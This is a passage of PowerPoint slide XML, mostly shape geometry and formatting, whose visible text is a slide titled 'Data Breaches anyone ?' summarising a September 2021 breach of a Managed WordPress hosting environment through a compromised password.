            <a:ext cx="10772775" cy="54228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cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Data Breaches anyone ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACEF28F9-9DF5-487E-A00E-FB7BF329788C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5565854" y="3814326"/>
            <a:ext cx="4327658" cy="1101483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E5318EA-EA42-4F4B-B1A4-6A3DFEFDE0E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303525" y="1214114"/>
            <a:ext cx="6407666" cy="1169551"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6407666"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX1" fmla="*/ 518438 w 6407666"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX2" fmla="*/ 1036877 w 6407666"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX3" fmla="*/ 1619392 w 6407666"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX4" fmla="*/ 2073754 w 6407666"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX5" fmla="*/ 2656269 w 6407666"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX6" fmla="*/ 3110631 w 6407666"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX7" fmla="*/ 3500916 w 6407666"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX8" fmla="*/ 4083431 w 6407666"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX9" fmla="*/ 4537793 w 6407666"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX10" fmla="*/ 5184384 w 6407666"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX11" fmla="*/ 5830976 w 6407666"/>
              <a:gd name="connsiteY11" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX12" fmla="*/ 6407666 w 6407666"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 1169551"/>
              <a:gd name="connsiteX13" fmla="*/ 6407666 w 6407666"/>
              <a:gd name="connsiteY13" fmla="*/ 561384 h 1169551"/>
              <a:gd name="connsiteX14" fmla="*/ 6407666 w 6407666"/>
              <a:gd name="connsiteY14" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX15" fmla="*/ 6017381 w 6407666"/>
              <a:gd name="connsiteY15" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX16" fmla="*/ 5498942 w 6407666"/>
              <a:gd name="connsiteY16" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX17" fmla="*/ 4980504 w 6407666"/>
              <a:gd name="connsiteY17" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX18" fmla="*/ 4526142 w 6407666"/>
              <a:gd name="connsiteY18" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX19" fmla="*/ 3879551 w 6407666"/>
              <a:gd name="connsiteY19" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX20" fmla="*/ 3361112 w 6407666"/>
              <a:gd name="connsiteY20" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX21" fmla="*/ 2778597 w 6407666"/>
              <a:gd name="connsiteY21" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX22" fmla="*/ 2067929 w 6407666"/>
              <a:gd name="connsiteY22" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX23" fmla="*/ 1677643 w 6407666"/>
              <a:gd name="connsiteY23" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX24" fmla="*/ 1159205 w 6407666"/>
              <a:gd name="connsiteY24" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX25" fmla="*/ 704843 w 6407666"/>
              <a:gd name="connsiteY25" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX26" fmla="*/ 0 w 6407666"/>
              <a:gd name="connsiteY26" fmla="*/ 1169551 h 1169551"/>
              <a:gd name="connsiteX27" fmla="*/ 0 w 6407666"/>
              <a:gd name="connsiteY27" fmla="*/ 573080 h 1169551"/>
              <a:gd name="connsiteX28" fmla="*/ 0 w 6407666"/>
              <a:gd name="connsiteY28" fmla="*/ 0 h 116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7666" h="1169551" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="200278" y="-5352"/>
                  <a:pt x="404048" y="24693"/>
                  <a:pt x="518438" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="632828" y="-24693"/>
                  <a:pt x="918402" y="6755"/>
                  <a:pt x="1036877" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1155352" y="-6755"/>
                  <a:pt x="1450195" y="69673"/>
                  <a:pt x="1619392" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1788589" y="-69673"/>
                  <a:pt x="1926244" y="16942"/>
                  <a:pt x="2073754" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2221264" y="-16942"/>
                  <a:pt x="2367086" y="16406"/>
                  <a:pt x="2656269" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945452" y="-16406"/>
                  <a:pt x="3007081" y="32389"/>
                  <a:pt x="3110631" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3214181" y="-32389"/>
                  <a:pt x="3310760" y="43836"/>
                  <a:pt x="3500916" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3691072" y="-43836"/>
                  <a:pt x="3926460" y="38800"/>
                  <a:pt x="4083431" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4240402" y="-38800"/>
                  <a:pt x="4338571" y="42453"/>
                  <a:pt x="4537793" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4737015" y="-42453"/>
                  <a:pt x="4918112" y="21658"/>
                  <a:pt x="5184384" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5450656" y="-21658"/>
                  <a:pt x="5584191" y="32084"/>
                  <a:pt x="5830976" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6077761" y="-32084"/>
                  <a:pt x="6260301" y="52202"/>
                  <a:pt x="6407666" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6463055" y="118492"/>
                  <a:pt x="6350905" y="447935"/>
                  <a:pt x="6407666" y="561384"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6464427" y="674833"/>
                  <a:pt x="6407167" y="989539"/>
                  <a:pt x="6407666" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6283662" y="1198497"/>
                  <a:pt x="6168388" y="1123430"/>
                  <a:pt x="6017381" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5866374" y="1215672"/>
                  <a:pt x="5620764" y="1154878"/>
                  <a:pt x="5498942" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5377120" y="1184224"/>
                  <a:pt x="5140997" y="1136744"/>
                  <a:pt x="4980504" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4820011" y="1202358"/>
                  <a:pt x="4630644" y="1167686"/>
                  <a:pt x="4526142" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4421640" y="1171416"/>
                  <a:pt x="4094667" y="1152269"/>
                  <a:pt x="3879551" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3664435" y="1186833"/>
                  <a:pt x="3540317" y="1146981"/>
                  <a:pt x="3361112" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3181907" y="1192121"/>
                  <a:pt x="2990693" y="1161939"/>
                  <a:pt x="2778597" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2566502" y="1177163"/>
                  <a:pt x="2276559" y="1161946"/>
                  <a:pt x="2067929" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1859299" y="1177156"/>
                  <a:pt x="1853041" y="1128375"/>
                  <a:pt x="1677643" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1502245" y="1210727"/>
                  <a:pt x="1317026" y="1147543"/>
                  <a:pt x="1159205" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1001384" y="1191559"/>
                  <a:pt x="803789" y="1141714"/>
                  <a:pt x="704843" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="605897" y="1197388"/>
                  <a:pt x="245804" y="1106890"/>
                  <a:pt x="0" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-12472" y="932832"/>
                  <a:pt x="31964" y="772620"/>
                  <a:pt x="0" y="573080"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-31964" y="373540"/>
                  <a:pt x="2669" y="139745"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="6407666" h="1169551" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="91415" y="-53411"/>
                  <a:pt x="235427" y="47668"/>
                  <a:pt x="454362" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="673297" y="-47668"/>
                  <a:pt x="953858" y="71644"/>
                  <a:pt x="1165030" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1376202" y="-71644"/>
                  <a:pt x="1481469" y="8840"/>
                  <a:pt x="1683469" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1885469" y="-8840"/>
                  <a:pt x="2155699" y="51435"/>
                  <a:pt x="2330060" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2504421" y="-51435"/>
                  <a:pt x="2713622" y="26367"/>
                  <a:pt x="2848499" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2983376" y="-26367"/>
                  <a:pt x="3349774" y="74229"/>
                  <a:pt x="3495091" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3640408" y="-74229"/>
                  <a:pt x="3744176" y="6851"/>
                  <a:pt x="3949452" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4154728" y="-6851"/>
                  <a:pt x="4228575" y="27954"/>
                  <a:pt x="4339737" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4450899" y="-27954"/>
                  <a:pt x="4889692" y="69492"/>
                  <a:pt x="5050406" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5211120" y="-69492"/>
                  <a:pt x="5399675" y="40736"/>
                  <a:pt x="5696998" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5994321" y="-40736"/>
                  <a:pt x="6086346" y="64057"/>
                  <a:pt x="6407666" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6415213" y="183664"/>
                  <a:pt x="6342417" y="357950"/>
                  <a:pt x="6407666" y="549689"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6472915" y="741428"/>
                  <a:pt x="6350511" y="876005"/>
                  <a:pt x="6407666" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6273382" y="1172240"/>
                  <a:pt x="6151200" y="1167333"/>
                  <a:pt x="5953304" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5755408" y="1171769"/>
                  <a:pt x="5476255" y="1110933"/>
                  <a:pt x="5242636" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5009017" y="1228169"/>
                  <a:pt x="4854895" y="1156779"/>
                  <a:pt x="4660121" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4465348" y="1182323"/>
                  <a:pt x="4428071" y="1132366"/>
                  <a:pt x="4269836" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4111602" y="1206736"/>
                  <a:pt x="3919464" y="1149289"/>
                  <a:pt x="3623244" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3327024" y="1189813"/>
                  <a:pt x="3289414" y="1157761"/>
                  <a:pt x="3040729" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2792045" y="1181341"/>
                  <a:pt x="2773583" y="1167061"/>
                  <a:pt x="2522290" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2270997" y="1172041"/>
                  <a:pt x="2090425" y="1144748"/>
                  <a:pt x="1939775" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1789125" y="1194354"/>
                  <a:pt x="1629066" y="1148917"/>
                  <a:pt x="1485413" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1341760" y="1190185"/>
                  <a:pt x="1091528" y="1158938"/>
                  <a:pt x="966975" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="842422" y="1180164"/>
                  <a:pt x="753850" y="1168374"/>
                  <a:pt x="576690" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399531" y="1170728"/>
                  <a:pt x="223361" y="1112112"/>
                  <a:pt x="0" y="1169551"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-68977" y="914827"/>
                  <a:pt x="50626" y="804291"/>
                  <a:pt x="0" y="573080"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-50626" y="341869"/>
                  <a:pt x="11266" y="149556"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="2459051683">
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <ask:type>
                    <ask:lineSketchScribble/>
                  </ask:type>
                </ask:lineSketchStyleProps>
              </a:ext>
            </a:extLst>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="31750"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B2D41"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Malicious third-party managed to gain access to its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="356AE6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Managed WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B2D41"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> hosting environment on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B2D41"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>September 6 2021</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B2D41"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> with the help of a compromised password, using it to obtain sensitive information pertaining to its customers. It's not immediately clear if the compromised password was secured with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B2D41"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>two-factor authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF0FDCBD-E0FF-41FC-89B5-14CB4BF974DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720335" y="1229737"/>
            <a:ext cx="4467558" cy="1257798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D102D59A-CE0E-4E75-BBDE-3568790EFF48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2322093" y="5457507"/>
            <a:ext cx="7443036" cy="800219"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 7443036"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX1" fmla="*/ 423681 w 7443036"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX2" fmla="*/ 921791 w 7443036"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX3" fmla="*/ 1494333 w 7443036"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX4" fmla="*/ 1992443 w 7443036"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX5" fmla="*/ 2713845 w 7443036"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX6" fmla="*/ 3063096 w 7443036"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX7" fmla="*/ 3412346 w 7443036"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX8" fmla="*/ 4133748 w 7443036"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX9" fmla="*/ 4482998 w 7443036"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX10" fmla="*/ 4832248 w 7443036"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX11" fmla="*/ 5330359 w 7443036"/>
              <a:gd name="connsiteY11" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX12" fmla="*/ 5902900 w 7443036"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX13" fmla="*/ 6252150 w 7443036"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX14" fmla="*/ 7443036 w 7443036"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 800219"/>
              <a:gd name="connsiteX15" fmla="*/ 7443036 w 7443036"/>
              <a:gd name="connsiteY15" fmla="*/ 416114 h 800219"/>
              <a:gd name="connsiteX16" fmla="*/ 7443036 w 7443036"/>
              <a:gd name="connsiteY16" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX17" fmla="*/ 7019355 w 7443036"/>
              <a:gd name="connsiteY17" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX18" fmla="*/ 6297954 w 7443036"/>
              <a:gd name="connsiteY18" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX19" fmla="*/ 5948703 w 7443036"/>
              <a:gd name="connsiteY19" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX20" fmla="*/ 5599453 w 7443036"/>
              <a:gd name="connsiteY20" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX21" fmla="*/ 5101342 w 7443036"/>
              <a:gd name="connsiteY21" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX22" fmla="*/ 4752092 w 7443036"/>
              <a:gd name="connsiteY22" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX23" fmla="*/ 4402842 w 7443036"/>
              <a:gd name="connsiteY23" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX24" fmla="*/ 4053592 w 7443036"/>
              <a:gd name="connsiteY24" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX25" fmla="*/ 3481051 w 7443036"/>
              <a:gd name="connsiteY25" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX26" fmla="*/ 2759649 w 7443036"/>
              <a:gd name="connsiteY26" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX27" fmla="*/ 2410399 w 7443036"/>
              <a:gd name="connsiteY27" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX28" fmla="*/ 1688997 w 7443036"/>
              <a:gd name="connsiteY28" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX29" fmla="*/ 967595 w 7443036"/>
              <a:gd name="connsiteY29" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX30" fmla="*/ 0 w 7443036"/>
              <a:gd name="connsiteY30" fmla="*/ 800219 h 800219"/>
              <a:gd name="connsiteX31" fmla="*/ 0 w 7443036"/>
              <a:gd name="connsiteY31" fmla="*/ 384105 h 800219"/>
              <a:gd name="connsiteX32" fmla="*/ 0 w 7443036"/>
              <a:gd name="connsiteY32" fmla="*/ 0 h 80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443036" h="800219" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="94317" y="-37310"/>
                  <a:pt x="314310" y="49036"/>
                  <a:pt x="423681" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="533052" y="-49036"/>
                  <a:pt x="801875" y="29077"/>
                  <a:pt x="921791" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1041707" y="-29077"/>
                  <a:pt x="1366761" y="7139"/>
                  <a:pt x="1494333" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1621905" y="-7139"/>
                  <a:pt x="1836870" y="7618"/>
                  <a:pt x="1992443" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2148016" y="-7618"/>
                  <a:pt x="2484975" y="20567"/>
                  <a:pt x="2713845" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2942715" y="-20567"/>
                  <a:pt x="2914654" y="502"/>
                  <a:pt x="3063096" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3211538" y="-502"/>
                  <a:pt x="3338113" y="2697"/>
                  <a:pt x="3412346" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3486579" y="-2697"/>
                  <a:pt x="3948269" y="26105"/>
                  <a:pt x="4133748" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4319227" y="-26105"/>
                  <a:pt x="4337430" y="2790"/>
                  <a:pt x="4482998" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4628566" y="-2790"/>
                  <a:pt x="4707369" y="28126"/>
                  <a:pt x="4832248" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4957127" y="-28126"/>
                  <a:pt x="5142979" y="15680"/>
                  <a:pt x="5330359" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5517739" y="-15680"/>
                  <a:pt x="5647617" y="13086"/>
                  <a:pt x="5902900" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6158183" y="-13086"/>
                  <a:pt x="6080107" y="2043"/>
                  <a:pt x="6252150" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6424193" y="-2043"/>
                  <a:pt x="7042930" y="98590"/>
                  <a:pt x="7443036" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7454255" y="149508"/>
                  <a:pt x="7411895" y="241960"/>
                  <a:pt x="7443036" y="416114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7474177" y="590268"/>
                  <a:pt x="7441582" y="700963"/>
                  <a:pt x="7443036" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7301942" y="818238"/>
                  <a:pt x="7227478" y="757401"/>
                  <a:pt x="7019355" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6811232" y="843037"/>
                  <a:pt x="6547465" y="729726"/>
                  <a:pt x="6297954" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6048443" y="870712"/>
                  <a:pt x="6035117" y="790011"/>
                  <a:pt x="5948703" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5862289" y="810427"/>
                  <a:pt x="5772676" y="768867"/>
                  <a:pt x="5599453" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5426230" y="831571"/>
                  <a:pt x="5318382" y="768052"/>
                  <a:pt x="5101342" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4884302" y="832386"/>
                  <a:pt x="4886543" y="799628"/>
                  <a:pt x="4752092" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4617641" y="800810"/>
                  <a:pt x="4516768" y="774857"/>
                  <a:pt x="4402842" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4288916" y="825581"/>
                  <a:pt x="4159294" y="789486"/>
                  <a:pt x="4053592" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
